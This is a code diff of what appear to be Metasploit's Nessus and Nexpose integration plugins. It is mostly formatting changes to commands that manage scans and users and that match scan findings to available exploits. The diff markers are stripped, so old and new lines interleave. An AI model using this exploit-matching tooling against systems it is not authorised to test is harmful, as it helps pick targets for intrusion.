stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
next if not o
o.references.map do |x|
if !(x.ctx_id == "URL")
if (x.ctx_id == "MSB")
stuff << "|#{x.ctx_val}"
else
stuff << "|#{x.ctx_id}-#{x.ctx_val}"
end
end
end
end
stuff << "\n"
f.puts(stuff)
}
stuff << "\n"
f.puts(stuff)
}
end
total = Time.now - start
print("\b\b\b[*]%clr")
print("\n")
print_status("It has taken : #{total} seconds to build the exploits search index")
end
def nessus_index
if File.exist?("#{Xindex}")
#check if it's version line matches current version.
@@ -79,7 +81,7 @@ module Msf
create_xindex
end
end
class ConsoleCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
@@ -126,11 +128,11 @@ module Msf
"nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit."
}
end
def cmd_nessus_index
Msf::Plugin::Nessus.nessus_index
end
def cmd_nessus_save(*args)
#if we are logged in, save session details to nessus.yaml
if args[0] == "-h"
@@ -138,15 +140,15 @@ module Msf
print_status(" nessus_save")
return
end
if args[0]
print_status("Usage: ")
print_status(" nessus_save")
return
end
group = "default"
if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
config = Hash.new
config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
@@ -154,15 +156,15 @@ module Msf
f.puts YAML.dump(config)
end
print_good("#{Nessus_yaml} created.")
else
print_error("Missing username/password/server/port - relogin and then try again.")
return
end
end
def cmd_nessus_report_exploits(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_summary <report id>")
@@ -172,20 +174,20 @@ module Msf
print_status("%redThis plugin is experimental%clr")
return
end
if ! nessus_verify_db
print_error("You need a database configured for this command.")
print_error("Connect to a db with \"db_connect\"")
print_error("Then import scan with nessus_report_get")
return
end
if ! nessus_verify_token
return
end
rid = nil
case args.length
when 1
rid = args[0]
@@ -195,12 +197,12 @@ module Msf
print_status("Parses your report and just shows you exploitable vulns.")
return
end
if check_scan(rid)
print_error("That scan is still running.")
return
end
#streaming parser ftw.
content = nil
content=@n.report_file_download(rid)
@@ -215,20 +217,20 @@ module Msf
parser.on_found_host = Proc.new { |host|
addr = host['addr'] || host['hname']
addr.gsub!(/[\n\r]/," or ") if addr
os = host['os']
os.gsub!(/[\n\r]/," or ") if os
hname = host['hname']
hname.gsub!(/[\n\r]/," or ") if hname
mac = host['mac']
mac.gsub!(/[\n\r]/," or ") if mac
host['ports'].each do |item|
next if item['port'] == 0
exp = []
msf = nil
nasl = item['nasl'].to_s
@@ -237,21 +239,21 @@ module Msf
name = item['svc_name']
severity = item['severity']
description = item['description']
cve = item['cve']
cve = item['cve']
bid = item['bid']
xref = item['xref']
msf = item['msf']
# find exploits based on the msf plugin name from the report output.
if msf
regex = Regexp.new(msf, true, 'n')
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
# find exploits based on CVE
if cve
cve.each do |c|
@@ -259,11 +261,11 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
#find exploits based on BID
if bid
bid.each do |c|
@@ -273,13 +275,13 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
#find exploits based on OSVDB entry
#find exploits based on MSB
if xref
xref.each do |c|
@@ -289,12 +291,12 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
end
end
end
end
end
end
nss = 'NSS-' + nasl
next if exp.empty?
print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n")
@@ -313,11 +315,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
if ! nessus_verify_token
return
end
case args.length
when 2
pid = args[0].to_i
@@ -328,30 +330,30 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
if check_policy(pid)
print_error("That policy does not exist.")
return
end
tgts = ""
framework.db.hosts(framework.db.workspace).each do |host|
tgts << host.address
tgts << ","
end
tgts.chop!
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace")
scan = @n.scan_new(pid, name, tgts)
if scan
print_status("Scan started. uid is #{scan}")
end
end
def cmd_nessus_logout
@token = nil
print_status("Logged out")
@@ -359,14 +361,14 @@ module Msf
print_good("#{Nessus_yaml} removed.")
return
end
def cmd_nessus_help(*args)
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Command',
'Help Text'
])
]
)
tbl << [ "Generic Commands", "" ]
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_connect", "Connect to a nessus server" ]
@@ -415,12 +417,13 @@ module Msf
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_policy_list", "List all polciies" ]
tbl << [ "nessus_policy_del", "Delete a policy" ]
puts "\n"
puts tbl.to_s + "\n"
print_status ""
print_status tbl.to_s
print_status ""
end
def cmd_nessus_server_feed(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_feed")
@@ -429,23 +432,22 @@ module Msf
print_status("Returns information about the feed type and server version.")
return
end
if nessus_verify_token
@feed, @version, @web_version = @n.feed
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Feed',
'Nessus Version',
'Nessus Web Version'
])
tbl << [@feed, @version, @web_version]
print_good("Nessus Status")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
end
def nessus_verify_token
if @token.nil? or @token == ''
ncusage
@@ -453,16 +455,16 @@ module Msf
end
true
end
def nessus_verify_db
if ! (framework.db and framework.db.active)
print_error("No database has been configured, please use db_create/db_connect first")
return false
end
true
end
def ncusage
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -480,9 +482,9 @@ module Msf
print_status("This only works after you have saved creds with nessus_save")
return
end
def cmd_nessus_connect(*args)
if ! args[0]
if File.exist?("#{Nessus_yaml}")
lconfig = YAML.load_file("#{Nessus_yaml}")
@@ -497,7 +499,7 @@ module Msf
return
end
end
if args[0] == "-h"
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -521,19 +523,19 @@ module Msf
print_status("know that nessus used a self signed cert and the risk that presents.")
return
end
if ! @token == ''
print_error("You are already authenticated. Call nessus_logout before authing again")
return
end
if(args.length == 0 or args[0].empty?)
ncusage
return
end
@user = @pass = @host = @port = @sslv = nil
case args.length
when 1,2
if args[0].include? "@"
@@ -548,7 +550,7 @@ module Msf
@port ||= '8834'
@sslv = args[1]
end
when 3,4,5
ncusage
return
@@ -556,12 +558,12 @@ module Msf
ncusage
return
end
if /\/\//.match(@host)
ncusage
return
end
if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok")
print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker")
print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus")
@@ -569,36 +571,34 @@ module Msf
print_error(" as an additional parameter to this command.")
return
end
if ! @user
print_good("Username:")
$stdout.flush
@user = gets
@user.chomp!
end
if ! @pass
print_good("Password:")
$stdout.flush
@pass = gets
@pass.chomp!
end
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
ncusage
return
end
nessus_login
end
def nessus_login
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
print_status("You need to connect to a server first.")
ncusage
return
end
@url = "https://#{@host}:#{@port}/"
print_status("Connecting to #{@url} as #{@user}")
@n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass)
@@ -610,9 +610,9 @@ module Msf
return
end
end
def cmd_nessus_report_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_list")
@@ -621,35 +621,34 @@ module Msf
print_status("Generates a list of all reports visable to your user.")
return
end
if ! nessus_verify_token
return
end
list=@n.report_list_hash
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'ID',
'Name',
'Status',
'Date'
])
list.each {|report|
t = Time.at(report['timestamp'].to_i)
tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus Report List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get a list of hosts from the report: nessus_report_hosts <report id>")
end
def check_scan(*args)
case args.length
when 1
rid = args[0]
@@ -657,7 +656,7 @@ module Msf
print_error("No Report ID Supplied")
return
end
scans = @n.scan_list_hash
scans.each {|scan|
if scan['id'] == rid
@@ -666,9 +665,9 @@ module Msf
}
return false
end
def cmd_nessus_report_get(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_get <report id>")
@@ -680,24 +679,24 @@ module Msf
print_status("Use: nessus_report_list to obtain a list of report id's")
return
end
if ! nessus_verify_token
return
end
if ! nessus_verify_db
return
end
if(args.length == 0 or args[0].empty? or args[0] == "-h")
print_status("Usage: ")
print_status(" nessus_report_get <report id> ")
print_status(" use nessus_report_list to list all available reports for importing")
return
end
rid = nil
case args.length
when 1
rid = args[0]
@@ -707,7 +706,7 @@ module Msf
print_status(" use nessus_report_list to list all available reports for importing")
return
end
if check_scan(rid)
print_error("That scan is still running.")
return
@@ -720,41 +719,38 @@ module Msf
end
print_status("importing " + rid)
framework.db.import({:data => content}) do |type,data|
case type
case type
when :address
@count = 0
print("%bld%blu[*]%clr %bld#{data}%clr")
$stdout.flush
print_line("%bld%blu[*]%clr %bld#{data}%clr")
when :port
print("\b")
print_line("\b")
case @count
when 0
print("%bld%grn|")
print_line("%bld%grn|")
@count += 1
when 1
print("%bld%grn/")
print_line("%bld%grn/")
@count += 1
when 2
print("%bld%grn-")
print_line("%bld%grn-")
@count += 1
when 3
print("%bld%grn/")
print_line("%bld%grn/")
@count = 0
end
$stdout.flush
when :end
print("\b Done!%clr\n")
$stdout.flush
when :os
print_line("\b Done!%clr\n")
when :os
data.gsub!(/[\n\r]/," or ") if data
print(" #{data} ")
end
print_line(" #{data} ")
end
end
print_good("Done")
end
def cmd_nessus_scan_status(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_status")
@@ -763,11 +759,11 @@ module Msf
print_status("Returns a list of information about currently running scans.")
return
end
if ! nessus_verify_token
return
end
list=@n.scan_list_hash
if list.empty?
print_status("No Scans Running.")
@@ -776,10 +772,9 @@ module Msf
print_status(" Create a scan: nessus_scan_new <policy id> <scan name> <target(s)>")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Scan ID',
'Name',
'Owner',
@@ -788,22 +783,22 @@ module Msf
'Current Hosts',
'Total Hosts'
])
list.each {|scan|
t = Time.at(scan['start'].to_i)
tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ]
}
print_good("Running Scans")
puts "\n"
puts tbl.to_s + "\n"
puts "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
print_good(" Pause a nessus scan : nessus_scan_pause <scanid>")
end
def cmd_nessus_template_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_template_list")
@@ -812,13 +807,13 @@ module Msf
print_status("Returns a list of information about the server templates..")
return
end
if ! nessus_verify_token
return
end
list=@n.template_list_hash
if list.empty?
print_status("No Templates Created.")
print_status("You can:")
@@ -826,30 +821,29 @@ module Msf
print_status(" Create a template: nessus_template_new <policy id> <scan name> <target(s)>")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Template ID',
'Policy ID',
'Name',
'Owner',
'Target'
])
list.each {|template|
tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ]
}
print_good("Templates")
puts "\n"
puts tbl.to_s + "\n"
puts "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
end
def cmd_nessus_user_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_list")
@@ -858,36 +852,35 @@ module Msf
print_status("Returns a list of the users on the Nessus server and their access level.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_status("Your Nessus user is not an admin")
end
list=@n.users_list
print_good("There are #{list.length} users")
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Is Admin?',
'Last Login'
])
list.each {|user|
t = Time.at(user['lastlogin'].to_i)
tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus users")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_server_status(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_status")
@@ -900,19 +893,18 @@ module Msf
if ! nessus_verify_token
return
end
#Check if we are an admin
if ! @n.is_admin
print_status("You need to be an admin for this.")
return
end
#Versions
cmd_nessus_server_feed
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Users',
'Policies',
'Running Scans',
@@ -922,19 +914,19 @@ module Msf
#Count how many users the server has.
list=@n.users_list
users = list.length
#Count how many policies
list=@n.policy_list_hash
policies = list.length
#Count how many running scans
list=@n.scan_list_uids
scans = list.length
#Count how many reports are available
list=@n.report_list_hash
reports = list.length
#Count how many plugins
list=@n.plugins_list
total = Array.new
@@ -943,12 +935,12 @@ module Msf
}
plugins = total.sum
tbl << [users, policies, scans, reports, plugins]
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_plugin_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_list")
@@ -957,14 +949,13 @@ module Msf
print_status("Returns a list of the plugins on the server per family.")
return
end
if ! nessus_verify_token
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Family Name',
'Total Plugins'
])
@@ -978,13 +969,13 @@ module Msf
tbl << [ '', '']
tbl << [ 'Total Plugins', plugins ]
print_good("Plugins By Family")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("List plugins for a family : nessus_plugin_family <family name>")
end
def check_policy(*args)
case args.length
when 1
pid = args[0]
@@ -992,7 +983,7 @@ module Msf
print_error("No Policy ID supplied.")
return
end
pol = @n.policy_list_hash
pol.each {|p|
if p['id'].to_i == pid
@@ -1001,9 +992,9 @@ module Msf
}
return true
end
def cmd_nessus_scan_new(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_new <policy id> <scan name> <targets>")
@@ -1013,11 +1004,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
if ! nessus_verify_token
return
end
case args.length
when 3
pid = args[0].to_i
@@ -1029,23 +1020,23 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
if check_policy(pid)
print_error("That policy does not exist.")
return
end
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}")
scan = @n.scan_new(pid, name, tgts)
if scan
print_status("Scan started. uid is #{scan}")
end
end
def cmd_nessus_scan_pause(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause <scan id>")
@@ -1055,11 +1046,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1069,14 +1060,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
pause = @n.scan_pause(sid)
print_status("#{sid} has been paused")
end
def cmd_nessus_scan_resume(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume <scan id>")
@@ -1086,11 +1077,11 @@ module Msf
print_status("use nessus_scan_status to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1100,14 +1091,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
resume = @n.scan_resume(sid)
print_status("#{sid} has been resumed")
end
def cmd_nessus_report_hosts(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_hosts <report id>")
@@ -1117,11 +1108,11 @@ module Msf
print_status("use nessus_report_list to list all available scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
rid = args[0]
@@ -1131,10 +1122,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Hostname',
'Severity',
'Sev 0',
@@ -1149,14 +1139,14 @@ module Msf
tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ]
}
print_good("Report Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get information from a particular host: nessus_report_host_ports <hostname> <report id>")
end
def cmd_nessus_report_host_ports(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_ports <hostname> <report id>")
@@ -1165,11 +1155,11 @@ module Msf
print_status("Returns all the ports associated with a host and details about their vulnerabilities")
print_status("use nessus_report_hosts to list all available hosts for a report")
end
if ! nessus_verify_token
return
end
case args.length
when 2
host = args[0]
@@ -1180,10 +1170,9 @@ module Msf
print_status(" use nessus_report_list to list all available reports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Port',
'Protocol',
'Severity',
@@ -1198,14 +1187,14 @@ module Msf
tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ]
}
print_good("Host Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>")
end
def cmd_nessus_report_host_detail(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_host_detail <hostname> <port> <protocol> <report id>")
@@ -1215,11 +1204,11 @@ module Msf
print_status("use nessus_report_host_ports to list all available ports for a host")
return
end
if ! nessus_verify_token
return
end
case args.length
when 4
host = args[0]
@@ -1232,10 +1221,9 @@ module Msf
print_status(" use nessus_report_host_ports to list all available ports")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Port',
'Severity',
'PluginID',
@@ -1248,15 +1236,25 @@ module Msf
])
details=@n.report_host_port_details(rid, host, port, prot)
details.each {|detail|
tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ]
tbl << [
detail['port'],
detail['severity'],
detail['pluginID'],
detail['pluginName'],
detail['cvss_base_score'] || 'none',
detail['exploit_available'] || '.',
detail['cve'] || '.',
detail['risk_factor'] || '.',
detail['cvss_vector'] || '.'
]
}
print_good("Port Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_scan_pause_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_pause_all")
@@ -1266,18 +1264,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_pause_all
print_status("All scans have been paused")
end
def cmd_nessus_scan_stop(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop <scan id>")
@@ -1287,11 +1285,11 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
sid = args[0]
@@ -1301,14 +1299,14 @@ module Msf
print_status(" use nessus_scan_status to list all available scans")
return
end
pause = @n.scan_stop(sid)
print_status("#{sid} has been stopped")
end
def cmd_nessus_scan_stop_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_stop_all")
@@ -1318,18 +1316,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_stop_all
print_status("All scans have been stopped")
end
def cmd_nessus_scan_resume_all(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_resume_all")
@@ -1339,18 +1337,18 @@ module Msf
print_status("use nessus_scan_list to list all running scans")
return
end
if ! nessus_verify_token
return
end
pause = @n.scan_resume_all
print_status("All scans have been resumed")
end
def cmd_nessus_user_add(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_add <username> <password>")
@@ -1360,16 +1358,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 2
user = args[0]
@@ -1380,7 +1378,7 @@ module Msf
print_status(" Only adds non admin users")
return
end
u = @n.users_list
u.each { |stuff|
if stuff['name'] == user
@@ -1396,9 +1394,9 @@ module Msf
print_error("#{user} was not added")
end
end
def cmd_nessus_user_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_del <username>")
@@ -1408,16 +1406,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
user = args[0]
@@ -1427,7 +1425,7 @@ module Msf
print_status(" Only dels non admin users")
return
end
del = @n.user_del(user)
status = del.root.elements['status'].text
if status == "OK"
@@ -1436,9 +1434,9 @@ module Msf
print_error("#{user} was not deleted")
end
end
def cmd_nessus_user_passwd(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_passwd <username> <password>")
@@ -1448,16 +1446,16 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 2
user = args[0]
@@ -1468,7 +1466,7 @@ module Msf
print_status(" User list from nessus_user_list")
return
end
pass = @n.user_pass(user,pass)
status = pass.root.elements['status'].text
if status == "OK"
@@ -1477,9 +1475,9 @@ module Msf
print_error("#{user}'s password has not been changed")
end
end
def cmd_nessus_admin(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_admin")
@@ -1489,20 +1487,20 @@ module Msf
print_status("use nessus_user_list to list all users")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
else
print_good("Your Nessus user is an admin")
end
end
def cmd_nessus_plugin_family(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_family <plugin family name>")
@@ -1512,11 +1510,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
fam = args[0]
@@ -1526,27 +1524,26 @@ module Msf
print_status(" list all plugins from a Family from nessus_plugin_list")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Plugin ID',
'Plugin Name',
'Plugin File Name'
])
family = @n.plugin_family(fam)
family.each {|plugin|
tbl << [ plugin['id'], plugin['name'], plugin['filename'] ]
}
print_good("#{fam} Info")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_policy_list(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_list")
@@ -1555,14 +1552,13 @@ module Msf
print_status("Lists all policies on the server")
return
end
if ! nessus_verify_token
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'ID',
'Name',
'Comments'
@@ -1572,12 +1568,12 @@ module Msf
tbl << [ policy['id'], policy['name'], policy['comments'] ]
}
print_good("Nessus Policy List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_policy_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_policy_del <policy ID>")
@@ -1587,16 +1583,16 @@ module Msf
print_status("use nessus_policy_list to list all policies")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
pid = args[0]
@@ -1606,9 +1602,8 @@ module Msf
print_status(" nessus_policy_list to find the id.")
return
end
print_error("Are you sure you want to delete #{pid} ?")
$stdout.flush
answer = gets
answer.chomp!
if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes"
@@ -1623,9 +1618,9 @@ module Msf
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_plugin_details(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_details <plugin file name>")
@@ -1635,11 +1630,11 @@ module Msf
print_status("use nessus_plugin_list to list all plugins")
return
end
if ! nessus_verify_token
return
end
case args.length
when 1
pname = args[0]
@@ -1649,14 +1644,13 @@ module Msf
print_status(" nessus_plugin_list and then nessus_plugin_family to find the plugin file name.")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'',
''
])
entry = @n.plugin_detail(pname)
print_good("Plugin Details for #{entry['name']}")
tbl << [ "Plugin ID", entry['id'] ]
@@ -1673,12 +1667,12 @@ module Msf
tbl << [ "Solution", entry['solution'] ]
tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ]
tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ]
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_report_del(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_del <reportname>")
@@ -1688,16 +1682,16 @@ module Msf
print_status("use nessus_report_list to list all reports")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
case args.length
when 1
rid = args[0]
@@ -1707,9 +1701,8 @@ module Msf
print_status(" nessus_report_list to find the id.")
return
end
print_error("Are you sure you want to delete #{rid} ?")
$stdout.flush
answer = gets
answer.chomp!
if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes")
@@ -1723,12 +1716,12 @@ module Msf
else
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_server_prefs(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_prefs")
@@ -1737,19 +1730,18 @@ module Msf
print_status("Returns a long list of server prefs.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Value'
])
@@ -1758,13 +1750,13 @@ module Msf
tbl << [ pref['name'], pref['value'] ]
}
print_good("Nessus Server Pref List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
def cmd_nessus_plugin_prefs(*args)
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_plugin_prefs")
@@ -1773,19 +1765,18 @@ module Msf
print_status("Returns a long list of plugin prefs.")
return
end
if ! nessus_verify_token
return
end
if ! @n.is_admin
print_error("Your Nessus user is not an admin")
return
end
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
'Columns' => [
'Name',
'Value',
'Type'
@@ -1795,11 +1786,11 @@ module Msf
tbl << [ pref['prefname'], pref['prefvalues'], pref['preftype'] ]
}
print_good("Nessus Plugins Pref List")
puts "\n"
puts tbl.to_s + "\n"
print_good "\n"
print_good tbl.to_s + "\n"
end
end
def initialize(framework, opts)
super
plugins/nexpose.rb
+34 -34
View File
@@ -566,44 +566,44 @@ class Plugin::Nexpose < Msf::Plugin
end
end
#
# Nexpose vuln lookup
#
def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
title = vulndef.attributes['title']
pciSeverity = vulndef.attributes['pciSeverity']
cvss_score = vulndef.attributes['cvssScore']
cvss_vector = vulndef.attributes['cvssVector']
vulndef.elements['references'].elements.each('reference') do |ref|
if ref.attributes['source'] == 'BID'
refs[ 'BID-' + ref.text ] = true
elsif ref.attributes['source'] == 'CVE'
# ref.text is CVE-$ID
refs[ ref.text ] = true
elsif ref.attributes['source'] == 'MS'
refs[ 'MSB-MS-' + ref.text ] = true
end
end
refs[ 'NEXPOSE-' + vid.downcase ] = true
vuln = framework.db.find_or_create_vuln(
#
# Nexpose vuln lookup
#
def nexpose_vuln_lookup(doc, vid, refs, host, serv=nil)
doc.elements.each("/NexposeReport/VulnerabilityDefinitions/vulnerability[@id = '#{vid}']]") do |vulndef|
title = vulndef.attributes['title']
pciSeverity = vulndef.attributes['pciSeverity']
cvss_score = vulndef.attributes['cvssScore']
cvss_vector = vulndef.attributes['cvssVector']
vulndef.elements['references'].elements.each('reference') do |ref|
if ref.attributes['source'] == 'BID'
refs[ 'BID-' + ref.text ] = true
elsif ref.attributes['source'] == 'CVE'
# ref.text is CVE-$ID
refs[ ref.text ] = true
elsif ref.attributes['source'] == 'MS'
refs[ 'MSB-MS-' + ref.text ] = true
end
end
refs[ 'NEXPOSE-' + vid.downcase ] = true
vuln = framework.db.find_or_create_vuln(
:host => host,
:service => serv,
:name => 'NEXPOSE-' + vid.downcase,
:data => title)
rids = []
refs.keys.each do |r|
rids << framework.db.find_or_create_ref(:name => r)
end
vuln.refs << (rids - vuln.refs)
end
end
rids = []
refs.keys.each do |r|
